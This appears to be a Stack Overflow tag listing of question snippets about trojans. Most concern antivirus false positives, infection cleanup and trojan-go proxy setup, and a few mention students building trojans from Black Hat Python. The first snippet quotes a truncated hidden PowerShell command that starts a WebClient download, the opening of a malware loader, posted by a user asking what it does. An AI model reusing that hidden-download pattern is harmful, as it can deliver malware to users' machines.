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What does this command prompt input do?

This is the input: cmd.exe /c powershell -WindowStyle Hidden -Command "$rQd=''; $pLs=New-Object System.Net.WebClient; $sLf=$pLs....
Jae's user avatar
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ls launch4j can add trojan into exe file

This is my first question, so please forgive me if I miss anything. I scanned my ".exe" file (converted from ".jar" with launch4j )using VirusTotal and found some trojans. Then I ...
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I get error line 919,in _find_spec AttributeError: 'GitImporter' object has no attribute 'find_spec' while making my trojan from black hat python book

I've seen some similar problems here, but any of suggested solutions don't work for my project, full error down bellow. By the way, while first error occures, other errors occured too, idk what's ...
Code_Maestro's user avatar
1 vote
2 answers

C Program exe file defined as a Trojan:Win32 Virus. How to solve this problem?

screenshot When I run a basic C code in VS Code then windows defender called it a Trojan:Win32. It makes the file removed. It really makes difficulties. So, what should I do now? I reinstall the mingw ...
Ahsanul Ekram Sahil's user avatar
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My self-written exe file is declared as a virus

I have written a program in Go to create PDFs and zip files with LaTeX and operating system board tools (it has to work on Linux and Windows). A few days ago, Windows Defender classified my exe as a ...
Ramona K.'s user avatar
1 vote
3 answers

APK detected as virus by google drive and email

I have a build variant which we are using internally for testing only and that is shared internally with the team over google drive or email. However, from the last one month, google is flagging this ...
tahreem's user avatar
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"sh Command not found" and "invalid payload"

I'm writing a trojan for a school project and it asked for a rb implant to be created. when I run the command it says that both the command is not found and that the payload is invalid. I'm ...
AIM's user avatar
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.NET WinForms App misidentified as Trojan AgentTesla

I am struggling with the Windows Defender. Since a few weeks a ClassLibrary.dll from our company gets flagged as the trojan "Trojan:MSIL/AgentTesla.CED!MTB" by the Windows Defender. Of ...
Thanatos's user avatar
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False-positive on Android app - APK:RepMalware [Trj]||arep

Our app in Play Store has been out for a couple of years and we have never experienced malware detection before. We are getting feedback from customers using Huawei, CAT and Samsung devices, detecting ...
Krister Moen's user avatar
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when assembling apk, it gives an error antivirus trojan on xiaomi phone

When I build an application for a test, for testing on a real device, when I open it, an error occurs associated with a Trojan virus, what could be the problem? Tell me please? this is the first time,...
Alex's user avatar
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apply plugin: 'com.amazonaws.appsync' detected as trojan

I am developing some personal project and I'm learning how to use aws. When I first ran the app it showed a warning which says the app is a threat, the details shows that it's trojan with a Risk name: ...
James's user avatar
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-2 votes
1 answer

Does anyone know how to remove "Trojan:HTML/CryptoStealBTC" from Windows 10 DELL laptop? [closed]

I have tried all ways to Quarantine, Remove the said threat from my system using Windows Security System. Still it is coming up as a threat to the system. If anyone knows how to affectively remove ...
Ankita's user avatar
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How to configure trojan to make it fall back to the site correctly?

I use the mirror jwilder/nginx-proxy to automatically HTTPS, and I deploy the trojan-go service through the compose.yml file. The content of the compose.yml file is shown below. I can open the HTTPS ...
haofunny's user avatar
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I get the error "github3.exceptions.NotFoundError: 404 Not Found" on chapter 7 of the book black hat python while making a trojan

At first I thought it was an error connecting with GitHub but this seems to not be the script since the first part of the script fires up normally Full output for context ┌──(kali㉿kali)-[~/bhptrojan] └...
SebstaBro7's user avatar
8 votes
6 answers

Program installed with Inno Setup seen as Trojan (Wacatac.B!ml)

My software is a .NET application. The original .exe compiled with Visual Studio works fine and Microsoft Defender has nothing to say about it or any of the dependencies. I made an installer with Inno ...
geriwald's user avatar
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1 answer

How to config Google Earth proxy when using trojan?

I'm using v2ray(trojan server) to connect to google, everything works fine on the brower, but when I open up Google Earth, it shows that Google earth is unable to connect to the Internet and try ...
manor's user avatar
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Is this VB script potentially dangerous?

this morning I received a mal containing, among other things, a file with the extension .wsf, on which I inadvertently clicked. I immediately realized that I had made a mistake ... but too late :( Can ...
Alessio De Feudis's user avatar
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strange network activity - tcpkill not working, port 4001

I am on a VPS, with tcpdump I noticied some traffic from and to port 4001 on my machine. I tried lsof -i :4001 which gives nothing I tried tcpkill port 4001, which gives "tcpkill: write: ...
sTONES's user avatar
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8 answers

C# Application Detected By Kaspersky As Trojan Virus (VHO:Trojan.MSIL.Convagent.gen)

I developped a C# winform application to import rows from firebird db when compile i have a message from vstudio that can't access to .exe file then an alert message from kaspersky to notice me from ...
Fad Sel's user avatar
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msi file built in Jenkins sometimes gets detected as trojan as sometimes not

I have a problem with a C# application built inside the Jenkins Build Environment of my company: the application sometimes is detected as trojan and sometimes not. After I build this C# application, ...
ef.7309's user avatar
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11 votes
3 answers

Antivirus detecting compiled C++ files as trojans

I had installed a c++ compiler for windows with MinGW. I tried to make a simple program: #include <iostream> using namespace std; int main() { cout << "Hello World!"; ...
gabriel's user avatar
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MinGW gcc C compiled program detected as virus by avast

I have readed a lot of people with the same problem but the most of them are Windows Defender, in my case it only happens with avast(free version) and it detects this simple hello program compiled ...
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I'm Getting this Trojan Detection Error When Installing Laravel

I'm trying to create a new project using "laravel new projectName". During installation it threw this error: ... - Removing graham-campbell/result-type (v1.0.1) - Downgrading vlucas/...
Siddique's user avatar
2 votes
1 answer

Payara Server 5.2020.4 Trojan:Script/Oneeva.A!ml

I just faced off an strange event when I tried to download the lastest Payara Server Community Full Edition (5.2020.4) on Payara website or on maven: Windows Defender made a trojan alert. The detected ...
BreizhDomino's user avatar
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Cannot Open a File with Subprocess.Popen()

I am trying to create a Python 3 based Trojan for my Ethical Hacking Course at So it is a basic Trojan that will open a picture on the surface but will extract and send ...
Faisal Ali Gama's user avatar
2 votes
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Windows defender suddenly started to delete my exe while other anti virus programs say ok, i don't understand why?

It was fine few months ago. but then suddenly "windows defender" and "windows security essential" are starting to delete my exe and say it is a Trojan:win32/... But all other ...
Orgil's user avatar
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WindowsDefender Trojan warning after compiling c program with string.h and stdio.h?

As you will see I am not good in c programming, still learning but my WindowsDefender is yelling at me for compiling this code with MinGW from Codeblocks IDE. #include <stdio.h> #include <...
mortytheshorty's user avatar
-1 votes
2 answers

Wordpress Hacked Website JS:Fakepush-A [Trj]

today my client told me that his website automatically redirect to another one external scam website. On first sight no problem in the file directories, and no injections in the fields of the ...
Luca Pisoni's user avatar
1 vote
1 answer

Ionic app is showing malicious in android devices. Risk name: Android:Evo-gen[Trj]+AG1335518|egap

Our application is in beta release. After downloading from play store, in some android devices it is slowing the app is malicious. Please refer to the images. In some devices it is showing warning ...
Ratikanta's user avatar
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1 answer

How to deal with a crate being marked as containing a Trojan?

I added one dependency to my project which added another and another - in the end, I got the crate pelite. This crate has a "blob" file which was marked by Windows as "Trojan:Win32/Fuery.B!cl" I ...
Victor Iorinescu's user avatar
2 votes
2 answers

Found Strange Bat in Windows Directory that's Linked to Detected Trojan, What's it Doing?

I was running a HitmanPro virus scan, and it detected b.exe which was located in my windows directory. There was another file, b.bat, presumably linked to b.exe, that has very strange code which I've ...
Collective Omniscience's user avatar
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Win'2019 is detecting my scripts with the Win32/Casur.A!cl trojan

I have a windows batch script that, depending on the user menu selection, opens a powershell.exe and passing a variable to run a .ps1 script. I then use Bat To Exe Converted (v3.0.10) to convert it to ...
yorkman's user avatar
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Identifiy why a Windows program I've written and compiled is identified as a trojan (C++)

I develop an open source ship simulator program. Recently, the Windows binaries (built myself on Visual Studio Communitity, both 2017 and a clean installation of 2019) are being flagged as trojans, ...
James's user avatar
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2 answers

Android APK file scanned with virus tool showing Trojan-Spy.AndroidOS.Agent

I have developed one Android App and published on the Google play store. but when a user runs an antivirus app, my app is showing Trojan-Spy.AndroidOS.Agent. becuase of this user has delated App. Is ...
Manish Nahar's user avatar
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Pyinstaller adddata query

When I am trying to converting my python file into executable and binding with pdf with using command add-data. My pdf file is store no where due to this I cannot open my pdf file while opening ...
divyansh jain's user avatar
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C Array creating Trojan?

I recently stared learning C. everything was fine but suddenly when today I was trying the 2d array with CodeBlocks Windows Defender constantly showing that my compiled file is a "Trojan:Win32/...
Drwe Joe's user avatar
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What is ".lifecycle-trojan" in my AndroidManifest.xml

I am using the implementation 'android.arch.lifecycle:extensions:1.1.1' in my project. When I build the release or debug apk and open AndroidManifest.xml from within the apk, I see this line. <...
dcanh121's user avatar
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Removal of JS:Miner-AI[PUP]

When I try to access every site without using HTTPS. I get a popup from avast telling me they have blocked it. It says 'JS:Miner-AI[PUP]'. When I try to access (without https) it happens ...
Atle Kristiansen's user avatar
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What is this VBA malware code trying to do?

My other half was sent a piece of malware in MS word VBA. The document was opened, editing enabled and the Trojan was missed by the anti virus for some reason. I'm 99% sure the system has been ...
Steven Woods's user avatar
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False virus/trojan alert on fresh created C# .exe file when downloaded from a website

I created/updated an installation application with C#, which installs files into the AppData/Roaming folders of the user. This installer loads and reads an XML file from a server, then copies file ...
Doerk's user avatar
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Is a valid system app on Android 7.0?

On my Samsung Galaxy S6 phone I see in Settings > Apps when I click Show system apps. A while ago I started to suspect that my phone might have been ...
Montia's user avatar
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Virus, trojan or something?

I write because I do not know what to do to fix the problem. In practice I have some websites and most of these have had problems with unidentified virus infection that led to the hacking of the sites....
Ogum's user avatar
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It's seem that the yarn is infected by Trojan, even if I reinstall my computer?

Every time when I start my yarn, I will find a task request which can't be finished, but I can't get any log about it and I didn't find any error. And I found a file in temp directory named ...
larry's user avatar
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PHP - Encoded Script

I am working on a Magento Project, version 1.9, which uses an extension called "Magenotification", while downloading the code to my local, my antivrus detected some files as "virus", my antivirus ...
Eduardo's user avatar
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NSIS installer vs Windows 10 Defender - block and message about Trojan Win32/Sprisky.U!cl

I created a simple installer in NSIS. During installation, the maxscript files are copied into the corresponding folders of 3ds max and keys are created in the registry for uninstall. The installer ...
zvon's user avatar
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3 votes
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Windows defender detecting exe as Trojan:Win32/Azden.A!cl virus

I'm facing an issue while installing an application on windows 10 enterprise edition. After installing application windows defender detect it as virus (Trojan:Win32/Azden.A!cl) and delete it's exe ...
Hafeez Rehman's user avatar
-3 votes
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Can someone help me understand this code ? Infected with Trojan Dropper VBS script

I wanna say sorry first , This isnt probly the best place to ask things like these , but i was infected by a virus and it seems to left traces. If someone can understand the code behind some ...
Frank Albert's user avatar
-2 votes
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How to Remove this Ransome ware from my computer

Today i opend my Computer and i saw that my all files are converted to KODC extension file . i think it is a ransomware can any one help me how i do resolve this . i have attached some screenshots ...
imdisney's user avatar
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Trojan in my VB application

I recently sent my application to a friend and to my surprise, he told me that he was with a Trojan. I checked the file in Virus Total and the site reported these things to me. Does anyone know how to ...
Sérgio Wilker's user avatar
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Virusscanner removes devtools package with trojan warning?

I am trying to install the devtools package with install.packages("devtools"): Installing package into ‘C:/Users/RenR/Documents/R/win-library/3.2’ (as ‘lib’ is unspecified) also installing the ...
RHA's user avatar
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